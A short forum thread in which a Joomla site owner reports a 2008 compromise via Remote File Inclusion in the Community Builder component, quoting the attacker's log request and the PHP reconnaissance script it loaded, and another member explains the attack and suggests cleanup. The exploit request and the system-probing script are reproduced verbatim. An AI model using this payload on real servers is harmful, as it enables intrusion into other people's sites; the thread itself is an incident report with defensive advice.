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Autore Topic: Hack on Comprofiler (CB 1.1)  (Letto 4646 volte)

Offline hs78

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Hack on Comprofiler (CB 1.1)
« il: 30 Set 2008, 15:01:33 »
Hi, my site (joomla 1.0.15 stable) has been hacked with the following command - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"

where urlcrack.txt contain the following text

function ConvertBytes($number)
        $len = strlen($number);
        if($len < 4)
                return sprintf("%d b", $number);
        if($len >= 4 && $len <=6)
                return sprintf("%0.2f Kb", $number/1024);
        if($len >= 7 && $len <=9)
                return sprintf("%0.2f Mb", $number/1024/1024);
        return sprintf("%0.2f Gb", $number/1024/1024/1024);

echo "narasaon
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "narasaon was here ..
echo "uname -a: $un
echo "os: $os
echo "uptime: $up
echo "id: $id1
echo "pwd: $pwd1
echo "php: $php1
echo "software: $sof1
echo "server-name: $name1
echo "server-ip: $ip1
echo "free: $free
echo "used: $used
echo "total: $all

Thanks to this code, hackers are able to send thousand of emails with our server.

Thanks in advance for any suggestion

Offline Locu

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Re: Hack on Comprofiler (CB 1.1)
« Risposta #1 il: 03 Ott 2008, 11:25:54 »
i think your site is bugged. This type of bugs are called RFI (Remote File Inclusion).

As you can see above the attacker has injected some malicious code into your site through the component "com_comprofiler". I suggest you to purge that component and perform a full check on server files and databases.

Anyway that script doesn't send email. It was used to retrive some info and psw from your server then the hacker has sent the emails using your data.

look at this one:

« Ultima modifica: 03 Ott 2008, 11:31:00 da Locu »
It is easier than you believe but more difficulty than you think!


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